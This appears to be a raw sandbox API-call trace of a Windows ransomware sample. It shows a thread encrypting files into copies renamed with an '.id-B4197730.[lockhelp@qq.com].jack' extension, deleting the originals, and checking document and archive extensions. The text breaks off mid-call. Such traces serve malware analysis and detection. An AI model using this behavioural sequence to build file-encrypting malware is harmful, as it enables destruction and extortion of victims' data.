[0203.750] GetTickCount () returned 0x30715 [0203.750] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0204.227] GetTickCount () returned 0x308ea [0204.227] GetTickCount () returned 0x308ea [0204.227] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0204.532] GetTickCount () returned 0x30a23 [0204.532] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0205.007] GetTickCount () returned 0x30c07 [0205.007] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0205.303] GetTickCount () returned 0x30d30 [0205.303] GetTickCount () returned 0x30d30 [0205.303] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0205.775] GetTickCount () returned 0x30f05 [0205.775] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0206.052] GetTickCount () returned 0x3101e [0206.052] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0206.280] GetTickCount () returned 0x310f9 [0206.280] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0206.392] GetTickCount () returned 0x31166 [0206.392] GetTickCount () returned 0x31166 [0206.393] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0207.040] GetTickCount () returned 0x313f6 [0207.040] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0207.387] GetTickCount () returned 0x3154e [0207.387] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0207.694] GetTickCount () returned 0x31677 [0207.694] GetTickCount () returned 0x31677 [0207.694] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0208.519] GetTickCount () returned 0x319b3 [0208.519] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0208.882] GetTickCount () returned 0x31b1a [0208.882] GetTickCount () returned 0x31b1a [0208.882] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0208.985] GetTickCount () returned 0x31b88 [0208.985] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0209.086] GetTickCount () returned 0x31bf5 [0209.087] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0209.197] GetTickCount () returned 0x31c63 [0209.197] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0209.305] GetTickCount () returned 0x31cd0 [0209.305] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0209.450] GetTickCount () returned 0x31d5d [0209.450] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0209.806] GetTickCount () returned 0x31ec4 [0209.806] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0209.949] GetTickCount () returned 0x31f51 [0209.949] GetTickCount () returned 0x31f51 [0209.949] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0210.082] GetTickCount () returned 0x31fce [0210.083] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0210.182] GetTickCount () returned 0x3203b [0210.182] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0210.291] GetTickCount () returned 0x320a8 [0210.291] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0210.450] GetTickCount () returned 0x32145 [0210.450] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0210.557] GetTickCount () returned 0x321b2 [0210.557] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0210.904] GetTickCount () returned 0x3230a [0210.904] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0211.010] GetTickCount () returned 0x32377 [0211.010] GetTickCount () returned 0x32377 [0211.010] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0211.128] GetTickCount () returned 0x323e4 [0211.128] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0211.230] GetTickCount () returned 0x32452 [0211.230] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0211.338] GetTickCount () returned 0x324bf [0211.338] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0211.447] GetTickCount () returned 0x3252d [0211.447] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0211.557] GetTickCount () returned 0x3259a [0211.557] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0211.666] GetTickCount () returned 0x32607 [0211.666] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0211.777] GetTickCount () returned 0x32675 [0211.777] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0211.885] GetTickCount () returned 0x326e2 [0211.885] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0211.995] GetTickCount () returned 0x3274f [0211.995] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0212.106] GetTickCount () returned 0x327bd [0212.106] GetTickCount () returned 0x327bd [0212.106] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0212.229] GetTickCount () returned 0x3283a [0212.229] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0212.338] GetTickCount () returned 0x328a7 [0212.338] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0214.677] GetTickCount () returned 0x331bf [0214.677] GetTickCount () returned 0x331bf [0214.677] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0214.968] GetTickCount () returned 0x332e8 [0214.968] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0215.316] GetTickCount () returned 0x33440 [0215.316] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0215.416] GetTickCount () returned 0x334ad [0215.416] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0215.541] GetTickCount () returned 0x3352a [0215.541] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0215.656] GetTickCount () returned 0x33598 [0215.656] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0215.760] GetTickCount () returned 0x33605 [0215.760] GetTickCount () returned 0x33605 [0215.760] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0215.915] GetTickCount () returned 0x33692 [0215.915] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0216.002] GetTickCount () returned 0x336ef [0216.002] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0218.036] GetTickCount () returned 0x33edf [0218.036] GetTickCount () returned 0x33edf [0218.036] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0218.142] GetTickCount () returned 0x33f4c [0218.142] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0218.252] GetTickCount () returned 0x33fb9 [0218.252] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0218.361] GetTickCount () returned 0x34027 [0218.361] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0219.471] GetTickCount () returned 0x3447c [0219.471] GetTickCount () returned 0x3447c [0219.471] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0219.819] GetTickCount () returned 0x345d4 [0219.819] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0219.929] GetTickCount () returned 0x34641 [0219.929] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0220.033] GetTickCount () returned 0x346af [0220.033] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0220.142] GetTickCount () returned 0x3471c [0220.143] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0220.256] GetTickCount () returned 0x34789 [0220.256] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0220.385] GetTickCount () returned 0x34806 [0220.385] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0220.487] GetTickCount () returned 0x34874 [0220.487] GetTickCount () returned 0x34874 [0220.487] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0220.596] GetTickCount () returned 0x348e1 [0220.596] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0220.705] GetTickCount () returned 0x3494f [0220.705] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0220.826] GetTickCount () returned 0x349bc [0220.826] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0220.924] GetTickCount () returned 0x34a29 [0220.924] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0221.066] GetTickCount () returned 0x34ab6 [0221.066] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0221.174] GetTickCount () returned 0x34b23 [0221.174] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0221.283] GetTickCount () returned 0x34b91 [0221.283] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0221.393] GetTickCount () returned 0x34bfe [0221.393] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0221.502] GetTickCount () returned 0x34c6b [0221.502] GetTickCount () returned 0x34c6b [0221.502] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0221.612] GetTickCount () returned 0x34cd9 [0221.612] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0221.721] GetTickCount () returned 0x34d46 [0221.721] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0221.830] GetTickCount () returned 0x34db4 [0221.830] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0221.940] GetTickCount () returned 0x34e21 [0221.940] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0222.072] GetTickCount () returned 0x34e9e [0222.072] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0222.174] GetTickCount () returned 0x34f0b [0222.174] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0222.283] GetTickCount () returned 0x34f79 [0222.283] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0222.393] GetTickCount () returned 0x34fe6 [0222.393] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0222.502] GetTickCount () returned 0x35053 [0222.502] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0222.617] GetTickCount () returned 0x350c1 [0222.617] GetTickCount () returned 0x350c1 [0222.617] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0222.721] GetTickCount () returned 0x3512e [0222.721] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0222.848] GetTickCount () returned 0x351bb [0222.848] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0222.955] GetTickCount () returned 0x35219 [0222.955] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0223.065] GetTickCount () returned 0x35286 [0223.065] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0223.175] GetTickCount () returned 0x352f3 [0223.175] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0223.283] GetTickCount () returned 0x35361 [0223.283] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0223.409] GetTickCount () returned 0x353de [0223.409] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0223.518] GetTickCount () returned 0x3544b [0223.518] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0223.627] GetTickCount () returned 0x354b8 [0223.627] GetTickCount () returned 0x354b8 [0223.627] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0223.736] GetTickCount () returned 0x35526 [0223.736] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0223.900] GetTickCount () returned 0x355c2 [0223.900] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0224.017] GetTickCount () returned 0x3563f [0224.018] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0224.127] GetTickCount () returned 0x356ac [0224.127] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0224.236] GetTickCount () returned 0x3571a [0224.236] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0224.346] GetTickCount () returned 0x35787 [0224.346] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0224.455] GetTickCount () returned 0x357f5 [0224.455] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0224.565] GetTickCount () returned 0x35862 [0224.565] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0224.674] GetTickCount () returned 0x358cf [0224.674] GetTickCount () returned 0x358cf [0224.674] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0224.783] GetTickCount () returned 0x3593d [0224.783] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) Thread: id = 16 os_tid = 0xa7c [0195.647] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x2389800 [0195.647] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x2399808 [0195.648] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378848 [0195.648] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x65a8c0 [0195.648] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378860 [0195.648] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x3ce8020 [0195.651] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378878 [0195.651] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x2378878, Size=0x20) returned 0x236bcd8 [0195.651] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378998 [0195.651] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x2378998, Size=0x20) returned 0x236b850 [0195.651] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0195.652] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0195.652] Wow64DisableWow64FsRedirection (in: OldValue=0x2a1ff50 | out: OldValue=0x2a1ff50*=0x0) returned 1 [0195.652] lstrlenW (lpString="kernel32.dll") returned 12 [0195.652] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x236bcd8 | out: hHeap=0x5e0000) returned 1 [0195.652] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0195.652] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x236b850 | out: hHeap=0x5e0000) returned 1 [0195.652] Sleep (dwMilliseconds=0x64) [0195.898] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0195.898] lstrlenW (lpString="GetCurrentOOBE.dll") returned 18 [0195.898] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0196.472] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=144072) returned 1 [0196.472] CloseHandle (hObject=0x3f4) returned 1 [0196.472] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll")) returned 0x20 [0196.472] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.472] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0196.472] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.473] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.473] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0196.903] GetLastError () returned 0x0 [0196.903] ReadFile (in: hFile=0x3f4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x232c8, lpOverlapped=0x0) returned 1 [0196.912] WriteFile (in: hFile=0x410, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x232d0, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x232d0, lpOverlapped=0x0) returned 1 [0196.915] ReadFile (in: hFile=0x3f4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.916] WriteFile (in: hFile=0x410, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0xf8, lpOverlapped=0x0) returned 1 [0196.916] SetEndOfFile (hFile=0x410) returned 1 [0196.916] CloseHandle (hObject=0x410) returned 1 [0196.923] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.923] SetEndOfFile (hFile=0x3f4) returned 1 [0196.924] CloseHandle (hObject=0x3f4) returned 1 [0196.925] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0196.925] DeleteFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll")) returned 1 [0196.925] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0196.925] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0196.925] lstrlenW (lpString=".doc") returned 4 [0196.925] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.925] lstrlenW (lpString=".docx") returned 5 [0196.925] lstrcmpiW (lpString1=".docx", lpString2="E.dll") returned -1 [0196.925] lstrlenW (lpString=".pdf") returned 4 [0196.925] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.925] lstrlenW (lpString=".xls") returned 4 [0196.926] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.926] lstrlenW (lpString=".xlsx") returned 5 [0196.926] lstrcmpiW (lpString1=".xlsx", lpString2="E.dll") returned -1 [0196.926] lstrlenW (lpString=".ppt") returned 4 [0196.926] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.926] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0196.926] lstrlenW (lpString=".zip") returned 4 [0196.926] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.926] lstrlenW (lpString=".rar") returned 4 [0196.926] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.926] lstrlenW (lpString=".bz2") returned 4 [0196.926] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.926] lstrlenW (lpString=".7z") returned 3 [0196.926] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.926] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0196.926] lstrlenW (lpString=".dbf") returned 4 [0196.926] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.926] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0196.926] lstrlenW (lpString=".1cd") returned 4 [0196.926] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.926] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0196.926] lstrlenW (lpString=".jpg") returned 4 [0196.926] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.926] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0196.926] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0196.926] lstrlenW (lpString=".doc") returned 4 [0196.926] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.926] lstrlenW (lpString=".docx") returned 5 [0196.926] lstrcmpiW (lpString1=".docx", lpString2="E.dll") returned -1 [0196.927] lstrlenW (lpString=".pdf") returned 4 [0196.927] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.927] lstrlenW (lpString=".xls") returned 4 [0196.927] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.927] lstrlenW (lpString=".xlsx") returned 5 [0196.927] lstrcmpiW (lpString1=".xlsx", lpString2="E.dll") returned -1 [0196.927] lstrlenW (lpString=".ppt") returned 4 [0196.927] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.927] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0196.927] lstrlenW (lpString=".zip") returned 4 [0196.927] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.927] lstrlenW (lpString=".rar") returned 4 [0196.927] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.927] lstrlenW (lpString=".bz2") returned 4 [0196.927] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.927] lstrlenW (lpString=".7z") returned 3 [0196.927] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.927] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0196.927] lstrlenW (lpString=".dbf") returned 4 [0196.927] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.927] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0196.927] lstrlenW (lpString=".1cd") returned 4 [0196.927] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.927] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 40 [0196.927] lstrlenW (lpString=".jpg") returned 4 [0196.927] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.928] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0196.928] lstrlenW (lpString="SetupResources.dll") returned 18 [0196.928] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0196.928] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=18776) returned 1 [0196.928] CloseHandle (hObject=0x3f4) returned 1 [0196.929] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll")) returned 0x80 [0196.929] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.929] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0196.929] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.929] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.929] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0196.970] GetLastError () returned 0x0 [0196.970] ReadFile (in: hFile=0x3f4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x4958, lpOverlapped=0x0) returned 1 [0196.985] WriteFile (in: hFile=0x414, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x4960, lpOverlapped=0x0) returned 1 [0196.986] ReadFile (in: hFile=0x3f4, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.986] WriteFile (in: hFile=0x414, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0xf8, lpOverlapped=0x0) returned 1 [0196.987] SetEndOfFile (hFile=0x414) returned 1 [0196.987] CloseHandle (hObject=0x414) returned 1 [0196.989] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.989] SetEndOfFile (hFile=0x3f4) returned 1 [0196.990] CloseHandle (hObject=0x3f4) returned 1 [0196.990] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0196.991] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll")) returned 1 [0196.991] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0196.991] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 45 [0196.991] lstrlenW (lpString=".doc") returned 4 [0196.991] lstrcmpiW (lpString1=".doc", 